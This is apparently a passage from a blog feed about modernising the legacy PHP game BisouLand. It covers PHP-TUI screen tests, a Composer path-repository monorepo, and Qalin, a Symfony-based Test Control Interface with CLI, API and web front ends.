#[TestDox('It fails when $scenario')]
public function test_it_fails_on_invalid_input(string $scenario, bool $preCreate, array $input): void
{
if ($preCreate) {
TestKernelSingleton::get()->actionRunner()->run(
new SignUpNewPlayer($input['username'], PasswordPlainFixture::makeString()),
);
}
$screen = TestKernelSingleton::get()->container()->get(UpgradeInstantlyForFreeScreen::class);
foreach (str_split($input['username']) as $char) {
$screen->handle(CharKeyEvent::new($char));
}
$screen->handle(CodedKeyEvent::new(KeyCode::Tab)); // username -> upgradable
foreach (str_split($input['upgradable_filter']) as $char) {
$screen->handle(CharKeyEvent::new($char));
}
$screen->handle(CodedKeyEvent::new(KeyCode::Tab)); // upgradable -> levels
if ('' !== $input['levels_override']) {
$screen->handle(CodedKeyEvent::new(KeyCode::Backspace)); // clear default '1'
foreach (str_split($input['levels_override']) as $char) {
$screen->handle(CharKeyEvent::new($char));
}
}
$screen->handle(CodedKeyEvent::new(KeyCode::Tab)); // levels -> Upgrade
$result = $screen->handle(CodedKeyEvent::new(KeyCode::Enter)); // submit
$this->assertInstanceOf(Stay::class, $result);
}
public static function invalidInputProvider(): \Iterator
{
yield [
'scenario' => 'invalid username',
'preCreate' => false,
'input' => ['username' => 'x', 'upgradable_filter' => '', 'levels_override' => ''],
];
yield [
'scenario' => 'invalid upgradable (ChoiceField: valid choices only)',
'preCreate' => true,
'input' => ['username' => UsernameFixture::makeString(), 'upgradable_filter' => 'zzz', 'levels_override' => ''],
];
yield [
'scenario' => 'invalid levels',
'preCreate' => true,
'input' => ['username' => UsernameFixture::makeString(), 'upgradable_filter' => '', 'levels_override' => '-1'],
];
}
The test arranges game state through Qalin's ActionRunner (the same one used by
the testsuite interface described in the previous article), then drives the TUI screen
purely through events. The terminal is never involved.
make phpunit arg='--testdox --order-by=default --filter UpgradeInstantlyForFreeScreenTest'
Upgrade Instantly For Free Screen (Bl\Qa\Tests\Qalin\Integration\UserInterface\Tui\Action\UpgradeInstantlyForFreeScreen)
✔ It upgrades instantly for free
✔ It has levels as an optional field (defaults to 1)
✔ It has levels as an optional field (set to 2)
✔ It has username as a required field
✔ It has upgradable as a required field
✔ It fails when invalid username
✔ It fails when invalid upgradable (ChoiceField: valid choices only)
✔ It fails when invalid levels
✔ It reports Navigate to HomeScreen when pressing Esc
🤔 Retrospective: the screen integration tests send real HTTP requests to a live Qalin server at
localhost:8080(configured viaQALIN_BASE_URIin.env.test). That means running them requires the server to be up. It is consistent with the TUI's own design (the TUI calls the HTTP API rather than handlers in-process), but it makes the tests heavier than they need to be. AMockHttpClientfrom Symfony would remove the server dependency and make the tests faster and self-contained.
PHP-TUI brings the Ratatui model to PHP: a retained-mode widget system, a constraint-based layout engine, and a clean event/render loop.
The architecture maps naturally to how we think about screens:
Screen::build() constructs a widget tree from current state: pure data, called every frameScreen::handle() processes one event and returns a navigation signalWhat surprised me is how little PHP-TUI requires. There is no framework to learn, no lifecycle to manage.
DisplayBuilder, Widget, WidgetRenderer, and a handful of layout types
cover everything. The rest is just PHP.
After a couple of days, I'm delighted to say that this is now my favourite Qalin UI. My geek honour is therefore saved 😼.
Want to learn more?
]]>In this series, we're dealing with it as it is: a big ball of mud, a spaghetti code base written by a student learning web development from online tutorials.
So far, we have:
The XSS fix introduced clean domain objects (Account, AuthToken) and PDO PostgreSQL
adapters. Qalin, the modern Symfony application built alongside the monolith,
depends on those same objects to create test scenarios.
Now we have two applications and ten packages. That is where a monorepo comes in.
Adding Qalin turned a single-application repository into something bigger: two apps and a growing set of shared packages.
In a multi-repository setup, each package lives in its own repository: its own checkout, its own CI pipeline, its own version tag, its own Packagist entry.
Changing an interface that touches two packages means:
A change that touches one line of an interface requires three commits across three repositories before you can test whether it compiles.
Cross-cutting tools face the same problem. A single PHPStan rule change
means updating ten phpstan.neon.dist files, one per package.
A monorepo solves this by putting everything in one place.
The root of the repository has two directories:
bisouland/
├── apps/
│ ├── monolith/ ← the 2005 LAMP app
│ └── qa/ ← Qalin (Symfony 8)
└── packages/
├── bl-auth/
├── bl-auth-bundle/
├── bl-auth-pdopg/
├── bl-auth-tests/
├── bl-exception/
├── bl-exception-bundle/
├── bl-game/
├── bl-game-bundle/
├── bl-game-pdopg/
└── bl-game-tests/
There is no root composer.json. Each application and each package manages its own
dependencies independently. What connects them is Composer's built-in support for
local path repositories.
When Composer resolves a package, it normally fetches it from Packagist.
But packages do not have to be published to be used.
Composer supports a path repository type that points to a local directory:
{
"repositories": [
{"type": "path", "url": "../../packages/*"}
]
}
The * glob means every subdirectory under packages/ is a potential package.
When you run composer install, Composer reads each subdirectory's composer.json,
finds the declared name, and makes it available as if it had been fetched from Packagist.
Here is the monolith's (app) composer.json:
{
"name": "bl/monolith",
"type": "project",
"repositories": [
{"type": "path", "url": "../../packages/*"}
],
"require": {
"php": ">=8.5",
"bl/auth": "*@dev",
"bl/auth-pdopg": "*@dev",
"bl/exception": "*@dev",
"ext-curl": "*",
"ext-pdo_pgsql": "*",
"symfony/uid": "^8.0"
}
}
The version constraint *@dev means "any version, at development stability".
Composer symlinks the local directory into vendor/ rather than copying it,
so edits to the package source are immediately reflected without a composer update.
Packages can also depend on each other.
bl/auth depends on bl/exception, and declares its own path repository pointing upstream:
{
"name": "bl/auth",
"type": "library",
"repositories": [
{"type": "path", "url": "../*"}
],
"require": {
"php": ">=8.5",
"bl/exception": "*@dev",
"symfony/uid": "^8.0"
},
"autoload": {
"psr-4": {"Bl\\Auth\\": "src/"}
}
}
The ten packages form a layered dependency graph. Each layer has a clear responsibility:
| Suffix | Responsibility |
|---|---|
| (none) | Domain model: interfaces, value objects, entities |
-pdopg |
Infrastructure: PDO PostgreSQL implementations |
-bundle |
Infrastructure: Symfony integration (service wiring) |
-tests |
Package unit tests and shared fixtures (builders, factories) |
The domain packages (bl-auth, bl-game) are framework-agnostic.
They declare interfaces and value objects but hold no framework dependency
beyond symfony/uid for UUID generation.
The infrastructure packages implement the domain interfaces using PDO. The application never depends on the implementation directly; it depends on the interface and relies on the Symfony bundle to provide the binding:
// packages/bl-auth-bundle/src/BlAuthBundle.php
final class BlAuthBundle extends AbstractBundle
{
public function loadExtension(array $config, ContainerConfigurator $container, ContainerBuilder $builder): void
{
$container->services()
->set(PdoPgSaveAuthToken::class)->autowire()->autoconfigure()
->alias(SaveAuthToken::class, PdoPgSaveAuthToken::class);
}
}
SaveAuthToken is the domain interface. PdoPgSaveAuthToken is the PDO implementation.
The bundle connects them.
🤔 Retrospective: back in 2016, when I explored MonoRepos with the Mars Rover series, one thing I was wondering about was whether Symfony's autowiring would play nicely with bundles living in local path-repository packages.
It does 🎉. Composer symlinks the package into
vendor/, Symfony finds the bundle through the normal discovery mechanism, and autowiring resolves across package boundaries without any extra configuration.
The test packages serve a dual purpose. They contain the package's own unit
tests, which PHPUnit discovers via the packages-spec suite in apps/qa.
They also expose builders and factories that other packages and applications
can import as test dependencies.
bl/auth-tests for example provides AccountFixture, a static factory that
assembles a valid Account with randomised defaults and optional overrides:
// packages/bl-auth-tests/src/Fixtures/AccountFixture.php
final readonly class AccountFixture
{
public static function make(
?AccountId $accountId = null,
?Username $username = null,
?PasswordHash $passwordHash = null,
): Account {
return new Account(
accountId: $accountId ?? AccountIdFixture::make(),
username: $username ?? UsernameFixture::make(),
passwordHash: $passwordHash ?? PasswordHashFixture::make(),
);
}
}
bl/game-tests follows the same pattern, providing PlayerFixture and its value-object
companions. A unit test in the QA application can pull fixtures from both packages
without any setup duplication:
// apps/qa/tests/Qalin/Spec/Application/Action/SignUpNewPlayerHandlerTest.php
use Bl\Auth\Tests\Fixtures\Account\PasswordPlainFixture;
use Bl\Auth\Tests\Fixtures\Account\UsernameFixture;
use Bl\Game\Tests\Fixtures\PlayerFixture;
public function test_it_signs_up_a_new_player_for_a_given_username_and_password(): void
{
$username = UsernameFixture::makeString();
$passwordPlain = PasswordPlainFixture::makeString();
$expectedPlayer = PlayerFixture::make();
// ...
}
Code quality is enforced from a single place: the QA application.
apps/qa/composer.json lists all packages in require and all tools in require-dev:
{
"name": "bl/qa",
"type": "project",
"repositories": [
{"type": "path", "url": "../../packages/*"}
],
"require": {
"php": ">=8.5",
"ext-curl": "*",
"ext-pdo_pgsql": "*",
"bl/auth": "*@dev",
"bl/auth-bundle": "*@dev",
"bl/auth-pdopg": "*@dev",
"bl/exception": "*@dev",
"bl/exception-bundle": "*@dev",
"bl/game": "*@dev",
"bl/game-bundle": "*@dev",
"bl/game-pdopg": "*@dev",
"phpspec/prophecy-phpunit": "^2.5",
"symfony/console": "^8.0.4",
"symfony/framework-bundle": "^8.0.5",
"symfony/monolog-bundle": "^4.0.1",
"symfony/property-access": "^8.0.4",
"symfony/property-info": "^8.0.5",
"symfony/routing": "^8.0.4",
"symfony/runtime": "^8.0.1",
"symfony/serializer": "^8.0.5",
"symfony/twig-bundle": "^8.0.4",
"symfony/uid": "^8.0.4",
"symfony/yaml": "^8.0.1"
},
"require-dev": {
"bl/auth-tests": "*@dev",
"bl/game-tests": "*@dev",
"friendsofphp/php-cs-fixer": "^3.94.1",
"jangregor/phpstan-prophecy": "^2.3",
"phpstan/phpstan": "^2.1.39",
"phpunit/phpunit": "^13",
"rector/rector": "^2.3.7",
"rector/swiss-knife": "^2.3.5",
"symfony/dotenv": "^8.0",
"symfony/http-client": "^8.0.5",
"symfony/maker-bundle": "^1.66"
},
"config": {
"allow-plugins": {
"symfony/runtime": true
},
"bump-after-update": true,
"sort-packages": true
}
}
Each tool is configured to scan everything: all apps (QA, monolith) and all packages.
PHPStan analyses them all at once:
# apps/qa/phpstan.neon.dist
includes:
- phpstan-baseline.neon
- vendor/jangregor/phpstan-prophecy/extension.neon
parameters:
level: 10
paths:
- src/
- tests/
- ../monolith/src/
- ../../packages/
excludePaths:
- templates/maker/
bootstrapFiles:
- vendor/autoload.php
- ../monolith/vendor/autoload.php
# legacy code is in phpincludes/, not src/ - baseline is empty
PHP CS Fixer scans the same three locations, but unlike PHPStan it reaches
into phpincludes/. Two legacy files that break the indentation rule are
excluded, and declare_strict_types is disabled: CS Fixer would apply it
blindly to every file, including the legacy ones where it causes fatal errors:
// apps/qa/.php-cs-fixer.dist.php
$finder = (new PhpCsFixer\Finder())
->in([
__DIR__,
__DIR__.'/../monolith',
__DIR__.'/../../packages',
])
->exclude(['var'])
->notPath([
'phpincludes/bisous.php',
'phpincludes/cerveau.php',
])
;
return (new PhpCsFixer\Config())
->setRules([
// ...
'declare_strict_types' => false, // would break legacy phpincludes/
// ...
])
// ...
;
Rector covers the same paths and applies the TYPE_DECLARATION set, which
includes adding declare(strict_types=1). Unlike CS Fixer, Rector analyses
each file before modifying it and only applies the transformation where it is
safe to do so; legacy files in phpincludes/ that would break are left alone:
// apps/qa/rector.php
return RectorConfig::configure()
->withPaths([
__DIR__,
__DIR__.'/../monolith',
__DIR__.'/../../packages',
])
->withSkip([
__DIR__.'/../monolith/vendor',
__DIR__.'/../../packages/*/vendor',
// ...
])
->withSets([
SetList::PHP_85,
SetList::TYPE_DECLARATION, // adds declare(strict_types=1) where safe
// ...
]);
PHPUnit organises tests into named suites covering all packages and both apps:
<!-- apps/qa/phpunit.xml.dist -->
<testsuites>
<testsuite name="packages-spec">
<directory>../../packages</directory>
</testsuite>
<testsuite name="qalin-spec">
<directory>tests/spec</directory>
</testsuite>
<testsuite name="qalin-integration">
<directory>tests/integration</directory>
</testsuite>
<testsuite name="monolith-smoke">
<directory>tests/monolith/smoke</directory>
</testsuite>
<testsuite name="monolith-end-to-end">
<directory>tests/monolith/end-to-end</directory>
</testsuite>
</testsuites>
Running make phpunit from the QA application executes every package spec,
every Qalin test, and every monolith integration test in one command.
We can select a specific subset of tests, using PHPUnit's options:
make phpunit arg='--testsuite qalin-spec,qalin-integration --filter Handler'
Each application has its own compose.yaml. The QA application mounts the
packages directory and the monolith source as Docker volumes:
# apps/qa/compose.yaml (excerpt)
services:
app:
volumes:
- ../../packages:/packages
- ../monolith:/apps/monolith
- bisouland-monolith_vendor:/apps/monolith/vendor
networks:
- bisouland-monolith_default
ports:
- "43010:8080"
Mounting the monolith's vendor from the monolith's own named volume
avoids duplicating the dependency installation.
The monolith must be started before the QA application so the named volume exists.
The root apps-init target enforces this order: it runs the monolith's app-init
before QA's, so the volume is always present by the time QA's containers start.
The QA application joins the monolith's Docker network (bisouland-monolith_default),
which allows the integration and end-to-end test suites to send real HTTP requests
to the monolith container using its internal hostname.
| Port | Service |
|---|---|
| 43000 | Monolith (web) |
| 43001 | Monolith (DB) |
| 43010 | Qalin (web) |
Port assignments follow a convention: the
43prefix is inspired by the game itself ("love" has 4 letters, "you" has 3), the next two digits identify the application (00for monolith,01for QA), and the last digit identifies the service (0for the web server,1for the database).
A root Makefile ties everything together with two targets:
# Makefile
apps-init:
@$(MAKE) -C apps/monolith app-init
@$(MAKE) -C apps/qa app-init
apps-qa:
@$(MAKE) -C apps/qa app-qa
make apps-init bootstraps both applications in the correct order.
make apps-qa runs the full quality pipeline from the QA application,
which in turn runs code style checks, static analysis, refactoring validation,
and all test suites:
# apps/qa/Makefile (excerpt)
app-qa: composer-dump cs-check phpstan rector-check phpunit
One command covers the entire codebase. No CI configuration file is required: whatever runs locally is what would run in any future CI environment.
A monorepo is not without cost.
Coupling risk: packages sharing a repository make it easy to skip proper
interfaces. A shortcut that imports an internal implementation directly rather
than going through the declared interface is one file away instead of one
repository away. The package graph above enforces discipline by design,
but nothing in the tooling prevents a careless use statement.
No granular access control: a contributor with read access to the repository can see every application and every package. For BisouLand this is not a concern, but it would matter in a team where different members should see different parts of the system.
Synchronised upgrades: upgrading a shared dependency or the PHP version requires every package and application to be updated at once. There is no gradual rollout across repositories; the whole monorepo moves together. For a small project this is an advantage as much as a cost, but in a large codebase with many packages it can turn a routine upgrade into a significant coordinated effort.
Repository growth: every application, package, vendor directory (as
bind-mount or volume), and test fixture lives in the same history. git clone
and git log grow with the full project. For a project of this size the
impact is negligible; at the scale of a large organisation it is not.
For BisouLand, a single-team project where all packages are internal, none of these tradeoffs are blocking. They are worth naming so the choice remains a deliberate one.
BisouLand started as a single PHP file importing other PHP files. After ten iterations it has two applications and ten packages.
A monorepo keeps them together without any tooling beyond what Composer already provides:
*@dev constraints opt out of version pinning for in-repository packagesNo monorepo-specific tooling was needed. No version synchronisation scripts.
No split tooling to publish packages separately. Everything lives in one checkout,
one git log, one make apps-qa.
🤔 Retrospective: this approach works well as long as all packages remain internal to the project. The moment one needs to be published to Packagist for external consumption, path repositories and
*@devconstraints are no longer sufficient. Tools such assymplify/monorepo-builderor GitHub Actions with a split workflow automate publishing each package to its own repository. For BisouLand, that day has not come.
Want to learn more?
composer.json files, path repositories linking themcomposer.json files in subdirectories and wires their dependencies,
removing the need to declare path repositories by handpmu require symfony/uid adds the constraint to every composer.json that needs it in a single command
The app was built by a student while learning xHTML, CSS, PHP and MySQL from online tutorials. Maintaining this big ball of mud / spaghetti code can be a real challenge!
In today's article, we'll explore how to improve Developer eXperience in such a hostile environment, by creating a modern Symfony application next to it.
This is the idea behind a Test Control Interface: a dedicated tool that lets anyone on the team (developers, QA, designers, product, etc) reach any application state on demand, without touching production code, without direct database access, and without waiting for time gates.
Want to verify that blowing a Smooch works? To do that you need to have built one first.
To build a Smooch, you need your Mouth at level 6. Here is what each upgrade costs and how long it takes for them to complete:
| Mouth level | Cost to next level | Completion time |
|---|---|---|
| 1 | 299 | 1 s |
| 5 | 1,478 | 22 min 28 s |
But to pay for those upgrades you need Love Points (LP). Your Heart generates them over time. The higher its level, the more it produces per hour:
| Heart level | LP generated / hr | Cost to next level | Completion time |
|---|---|---|---|
| 1 | 14 | 150 | 1 s |
| 5 | 1,657 | 739 | 1 hr 11 min |
| 10 | 3,019 | 5,460 | 8 hr 50 min |
Starting fresh with 300 LP, here is the full breakdown:
| Upgrade | Cost | Waiting for LP | Waiting for completion |
|---|---|---|---|
| Heart 1→2 | 150 | 0s | 1s |
| Heart 2→3 | 223 | 16m 0s | 11s |
| Heart 3→4 | 333 | 26m 45s | 5m 0s |
| Heart 4→5 | 496 | 21m 12s | 26m 24s |
| Heart 5→6 | 739 | 7m 12s | 1h 11m |
| Heart 6→7 | 1,103 | 0s | 2h 19m |
| Heart 7→8 | 1,645 | 0s | 3h 44m |
| Heart 8→9 | 2,454 | 0s | 5h 21m |
| Heart 9→10 | 3,660 | 0s | 7h 4m |
| Mouth 1→2 | 299 | 0s | 1s |
| Mouth 2→3 | 446 | 0s | 1s |
| Mouth 3→4 | 665 | 0s | 49s |
| Mouth 4→5 | 991 | 0s | 6m 27s |
| Mouth 5→6 | 1,478 | 0s | 22m 28s |
| Total | 15,182 | 1h 11m | 20h 43m |
Nearly a day of watching completion timers tick. And once you finally can build that Smooch, you still cannot blow it: players need 50 Score Points first, which means more grinding (1,000 Love Points spent = 1 Score Point earned).
The classic developer hacks are familiar:
You need a controlled, shareable way to reach any predetermined state instantly.
In 2021, Sergey Ryabko described API for QA: Testing features when you have no access to code, the Test Control Interface built at Bumble Inc, the dating app. The tool is called QAAPI.
The core idea: rather than touching the database directly or bending production code to fit a test scenario, you expose a dedicated set of controlled operations via HTTP. A web UI built on top gives everyone on the team (developers, QA, designers, product) a friendly way to check, demo, or test the app.
Consider a promotional banner: three days after registration, show the user a discounted premium upsell. To test it, you would normally register an account and wait three days. To avoid that, a QAAPI method offsets the registration date for a specific test user:
/SetPromoTimeOffset?seconds=20&userid=12345
And 20 seconds after registration, user 12345 sees the banner.
Its implementation is a self-contained class with three elements:
a description, typed parameters, and a run() method with the logic:
class SetPromoTimeOffset extends \QAAPI\Methods\AbstractMethod
{
public function getDescription(): string
{
return <<<Description
Sets a time offset in seconds between the user's registration date and the promo showing
Description;
}
public function getParamsConfig(): array
{
return [
'user_id' => \QAAPI\Params\UserId::create(),
'seconds' => \QAAPI\Params\PositiveInteger::create()
->setDescription('Offset in seconds'),
];
}
public function run(): \QAAPI\Models\Output
{
// logic here
return \QAAPI\Models\Output::success();
}
}
Documentation is generated automatically from those definitions.
Security is layered to make broad access safe: network-level (VPN only), authentication (Google OAuth for engineers, secret token for automated tests), and data-level (methods only operate on flagged test users, never real ones).
Beyond raw methods, QAAPI also has Scenarios: combinations of methods written ad-hoc in Lua that reproduce a complete feature flow in one call, acting as living documentation of complex flows.
At Bumble, QAAPI has grown to over 1,500 methods and has been in use since 2013.
In an earlier article (2019), Vladimir Yants described
A monolithic architecture for our clients' hundreds of versions: how we write and support tests,
showing QAAPI used programmatically inside automated API tests: three calls to set up a
test user's profession, A/B test group, and registration date, then assert on the server
response. The article also details their test user pool (pre-registered users with an
is_test_user flag, restored to a clean state after each test) and how that flag lets them
run the same API tests against a pre-production cluster with real data, while keeping test
users isolated from real ones.
✏️ Edit: Artem Soldatkin rightly points out that the first version of QAAPI was authored by Ilya Ageev and created at Badoo in 2013, before Bumble existed and before Badoo was incorporated into Bumble Inc.
A Test Control Interface is a deceptively simple idea whose implementation cost is low, yet it makes everyone on the team faster and transforms how they work.
Simple enough that I built a working prototype for BisouLand in two weeks.
Qalin (pronounced câlin) stands for Quality Assurance Local Interface Nudger.
It is BisouLand's Test Control Interface, built on top of Symfony 8 with PHP 8.5.
It follows the same concept as QAAPI, with a few differences suited to the Symfony ecosystem: input is a separate readonly DTO rather than a method on the class, dependencies are injected via the constructor rather than inherited from a base class, and the handler is wired through Symfony's service container.
Qalin runs alongside the app in local, dev, test, and staging environments. It is never deployed to production.
Actions are atomic operations. Each one has three parts: an input DTO, a handler, and an output DTO.
The input DTO is a readonly class with typed public properties.
Constructor promotion keeps it concise:
final readonly class UpgradeInstantlyForFree
{
public function __construct(
public string $username,
public string $upgradable,
public int $levels = 1,
) {
}
}
The handler receives the input DTO, validates it, calls domain services, and returns an output DTO:
final readonly class UpgradeInstantlyForFreeHandler
{
public function __construct(
private ApplyCompletedUpgrade $applyCompletedUpgrade,
private FindPlayer $findPlayer,
) {
}
public function run(UpgradeInstantlyForFree $input): UpgradeInstantlyForFreed
{
$username = Username::fromString($input->username);
$upgradable = Upgradable::fromString($input->upgradable);
if ($input->levels < 1) {
throw ValidationFailedException::make(
"Invalid \"UpgradeInstantlyForFree\" parameter: it should have levels >= 1 (`{$input->levels}` given)",
);
}
$player = $this->findPlayer->find($username);
for ($i = 0; $i < $input->levels; ++$i) {
$upgradable->checkPrerequisites($player->upgradableLevels);
$milliScore = $upgradable->computeCost($player->upgradableLevels);
$player = $this->applyCompletedUpgrade->apply($username, $upgradable, $milliScore);
}
return new UpgradeInstantlyForFreed($player);
}
}
Notice what is absent: no cost deduction, no completion timer. The action reaches directly into the domain service that applies a completed upgrade and calls it in a loop. That is the point.
Scenarios are handlers that compose other handlers.
Instead of inheriting from a base class,
they receive action handlers as constructor dependencies
and call their run() methods in sequence:
final readonly class SignInNewPlayerHandler
{
public function __construct(
private SignUpNewPlayerHandler $signUpNewPlayerHandler,
private SignInPlayerHandler $signInPlayerHandler,
) {
}
public function run(SignInNewPlayer $input): SignedInNewPlayer
{
$signedUp = $this->signUpNewPlayerHandler->run(
new SignUpNewPlayer($input->username, $input->password),
);
$signedIn = $this->signInPlayerHandler->run(
new SignInPlayer($signedUp->player->account->username->toString()),
);
return new SignedInNewPlayer($signedUp, $signedIn);
}
}
SignInNewPlayer signs up a brand-new player and immediately signs them in,
returning their session cookie in one call. No curl, no browser, no waiting.
🤔 Retrospective:
SignInNewPlayerwas the smallest scenario I could build to close the two-week spike. It composes two actions and covers a real need, but it does not yet showcase the full value of scenarios. A more representative example would beUnlockLeap: to test cloud-leaping, a player needs Leap at level 1, which requires Legs at level 2, which requires Heart at level 15. The scenario would callupgrade-instantly-for-freeon each upgradable in order, dropping the player straight into a state where the leap feature can be exercised. That kind of scenario is what a Test Control Interface is really for.
For developers who live in the terminal, the same actions and scenarios are available as
Symfony console commands. Modern Symfony Console attributes eliminate all of the
traditional configure() / execute() scaffolding:
#[AsCommand(
name: 'action:upgrade-instantly-for-free',
description: 'Instantly upgrade for free',
)]
final readonly class UpgradeInstantlyForFreeCommand
{
public function __construct(
private UpgradeInstantlyForFreeHandler $upgradeInstantlyForFreeHandler,
) {
}
public function __invoke(
#[Argument(description: 'an existing one')]
string $username,
#[Argument(description: 'an Organ (e.g. heart), Bisou (e.g. smooch) or Technique (e.g. hold_breath)')]
string $upgradable,
SymfonyStyle $io,
#[Option(description: 'how many levels to upgrade at once')]
int $levels = 1,
): int {
try {
$upgradeInstantlyForFreed = $this->upgradeInstantlyForFreeHandler->run(
new UpgradeInstantlyForFree($username, $upgradable, $levels),
);
} catch (ValidationFailedException $e) {
$io->error($e->getMessage());
return Command::INVALID;
} catch (ServerErrorException $e) {
$io->error($e->getMessage());
return Command::FAILURE;
}
$io->success('Successfully completed Upgrade Instantly For Free');
$rows = [];
foreach ($upgradeInstantlyForFreed->toArray() as $field => $value) {
$rows[] = [$field, $value];
}
$table = new Table($io);
$table->setStyle('markdown');
$table->setHeaders(['Field', 'Value']);
$table->setRows($rows);
$table->render();
return Command::SUCCESS;
}
}
🎶 Modern Symfony:
#[AsCommand](introduced in Symfony 5.3) registers the command.#[Argument]and#[Option](introduced in Symfony 7.3) declare the parameters directly on__invoke(), replacing theconfigure()/execute()boilerplate entirely. Symfony injectsSymfonyStyleautomatically.
The command is callable from a Makefile target:
make qalin arg='scenario:sign-in-new-player Petrus iLoveBlade'
make qalin arg='action:upgrade-instantly-for-free Petrus heart --levels=5'

🤔 Retrospective: the CLI currently calls action and scenario handlers directly, in-process. A better implementation would have it call the HTTP API instead, using an HTTP client. That would let the CLI target any environment, local or staging, by just changing the base URL. The direct handler approach was a POC shortcut.
The API is the foundation on which other interfaces are built. The Web UI calls it, nothing stops you from building a Rust TUI or a mobile debug screen on top of it, and it is what makes Qalin usable on remote environments like staging servers.
Each action and scenario is a dedicated controller, registered with #[Route] and
accepting a deserialized input DTO via #[MapRequestPayload]:
final readonly class UpgradeInstantlyForFreeController
{
public function __construct(
private UpgradeInstantlyForFreeHandler $upgradeInstantlyForFreeHandler,
) {
}
#[Route('/api/v1/actions/upgrade-instantly-for-free', methods: ['POST'])]
public function __invoke(
#[MapRequestPayload]
UpgradeInstantlyForFree $upgradeInstantlyForFree,
): JsonResponse {
$upgradeInstantlyForFreed = $this->upgradeInstantlyForFreeHandler->run($upgradeInstantlyForFree);
return new JsonResponse(
json_encode($upgradeInstantlyForFreed->toArray(), \JSON_THROW_ON_ERROR),
Response::HTTP_CREATED,
json: true,
);
}
}
🎶 Modern Symfony:
#[MapRequestPayload](introduced in Symfony 6.3) deserializes the JSON body into the input DTO and runs validation automatically. The controller itself has no boilerplate: it calls the handler and returns the result.
Calling it looks like this:
curl -X POST http://localhost:43010/api/v1/scenarios/sign-in-new-player \
-H 'Content-Type: application/json' \
-d '{"username": "Petrus", "password": "iLoveBlade"}'
curl -X POST http://localhost:43010/api/v1/actions/upgrade-instantly-for-free \
-H 'Content-Type: application/json' \
-d '{"username": "Petrus", "upgradable": "heart", "levels": 5}'
For designers and product people who prefer a browser, each action and scenario has a web page with a form.
The controller is a straightforward GET that renders a Twig template:
#[Route('/actions/upgrade-instantly-for-free', methods: ['GET'])]
public function __invoke(): Response
{
return new Response($this->twig->render('qalin/action/upgrade-instantly-for-free.html.twig', [
'upgradables' => Upgradable::cases(),
]));
}
The template itself is a plain HTML form with a data-api attribute pointing to the
API endpoint:
{% extends 'base.html.twig' %}
{% block title %}Upgrade Instantly For Free - Qalin{% endblock %}
{% block body %}
<h2>Action: Upgrade Instantly For Free</h2>
<form data-api="/api/v1/actions/upgrade-instantly-for-free" data-expect="201">
<label for="username">Username</label>
<input class="u-full-width" type="text" id="username" name="username" required>
<label for="upgradable">Upgradable</label>
<select class="u-full-width" id="upgradable" name="upgradable" required>
{% for upgradable in upgradables %}
<option value="{{ upgradable.value }}">{{ upgradable.name }}</option>
{% endfor %}
</select>
<label for="levels">Levels</label>
<input class="u-full-width" type="number" id="levels" name="levels" value="1">
<button class="button-primary" type="submit">Upgrade Instantly For Free</button>
</form>
<div class="result"></div>
{% endblock %}
A small JavaScript snippet in the base layout reads data-api, serializes the form as
JSON, POSTs it to the API, and renders the response into .result. No JavaScript
framework, no build step: just Twig and a <form>.

🤔 Retrospective: the web interface is the weakest part of the current implementation. A future iteration could replace the vanilla JavaScript with HTMX for a cleaner, server-driven approach.
Qalin exposes an ActionRunner and a ScenarioRunner that call handlers in-process,
with no HTTP overhead.
Automated tests (e.g. EndToEnd) use them in the Arrange phase to set up game state without raw SQL, without curl, and without coupling tests to database schema:
#[CoversNothing]
#[Large]
final class LogOutTest extends TestCase
{
public function test_it_allows_players_to_log_out(): void
{
// Arrange
$httpClient = TestKernelSingleton::get()->httpClient();
$scenarioRunner = TestKernelSingleton::get()->scenarioRunner();
/** @var SignedInNewPlayer $signedInNewPlayer */
$signedInNewPlayer = $scenarioRunner->run(new SignInNewPlayer(
UsernameFixture::makeString(),
PasswordPlainFixture::makeString(),
));
$sessionCookie = $signedInNewPlayer->toArray()['cookie'];
// Act
$httpClient->request('GET', '/logout.html', [
'headers' => ['Cookie' => $sessionCookie],
]);
// Assert
$response = $httpClient->request('GET', '/cerveau.html', [
'headers' => ['Cookie' => $sessionCookie],
]);
$this->assertStringContainsString("Tu n'es pas connecté.", $response->getContent());
$this->assertSame(200, $response->getStatusCode());
}
}
The Arrange is one call. It reads as plain English. The test is about logout, not about the sign-up and sign-in machinery needed to reach that state.
That machinery is encapsulated in the SignInNewPlayer scenario,
reused across every test that needs a logged-in player.
This is where the Test Control Interface pays off most: not only for manual testers, but also for the automated test suite that runs on every commit. Bumble arrived at the same pattern: their API tests call QAAPI methods in the arrange phase to configure test users before exercising the real protocol.
✏️ Edit: obstreperous_troll on Reddit observes that this resembles white-box testing, since Qalin reaches into internal state to set things up. That is a fair comparison: Qalin is white-box for the Arrange part of a test (it bypasses the public API to put the system in a specific state), but black-box for the Act and Assert parts (the test exercises real HTTP endpoints and checks real responses, just like any external consumer would).
✏️ Edit: Benjamin Rothan asks whether this is fixture generation for QA. Symfony developers may recognise a resemblance to Doctrine Fixtures or FakerBundle, but the intent is different: fixtures generate seed data at deployment time (a fixed dataset loaded once), whereas Qalin actions are called on demand, at any time, to reach a specific state for a specific test or demo. Think of it as a remote control for your application state, not a data seeder.
Adding a new action to Qalin means creating a handler, an input DTO, an output DTO, a CLI command, an API controller, a Web controller, a Twig template, and tests for all of them. That is 12 files.
Writing them by hand once is instructive. Doing it for every new action is not.
Qalin ships a custom MakerBundle command, make:qalin:action, that generates all 12
files from a single invocation:
make qalin-action arg='UpgradeInstantlyForFree \
--description="Instantly upgrade an upgradable for free" \
--output-name=UpgradeInstantlyForFreed \
--parameter="username:string:an existing username" \
--parameter="upgradable:string:an organ (e.g. heart), a bisou (e.g. smooch) or a technique (e.g. hold_breath)" \
--parameter="levels:int:number of levels to upgrade:1"'
The --parameter flag follows a name:type:description[:default] format.
Providing a default makes the parameter optional, omitting it makes it required.
The generator sorts required parameters before optional ones automatically, respecting PHP's constraint on default values.
The generated files are fully wired:
* the CLI command uses #[AsCommand], #[Argument] and #[Option]
* the API controller uses #[Route] and #[MapRequestPayload]
* the input DTO is the same class used by all three interfaces and the testsuite
* Spec tests for the DTO and handler are generated with Prophecy stubs pre-populated
* Integration tests for each interface are generated with the correct
#[CoversNothing] / #[Medium] attributes and data providers stubbed out.
After generation, the workflow is:
UpgradeInstantlyForFreeHandler.phpTODO commentsmake phpstan-analyze and make phpunitThe command also has an interactive mode for when you want to be guided through
each field, and a make:qalin:scenario counterpart that adds a --action option for
composing existing action handlers:
make qalin-scenario arg='SignInNewPlayer \
--description="Sign up and immediately sign in a brand-new player" \
--output-name=SignedInNewPlayer \
--parameter="username:string:4-15 alphanumeric characters" \
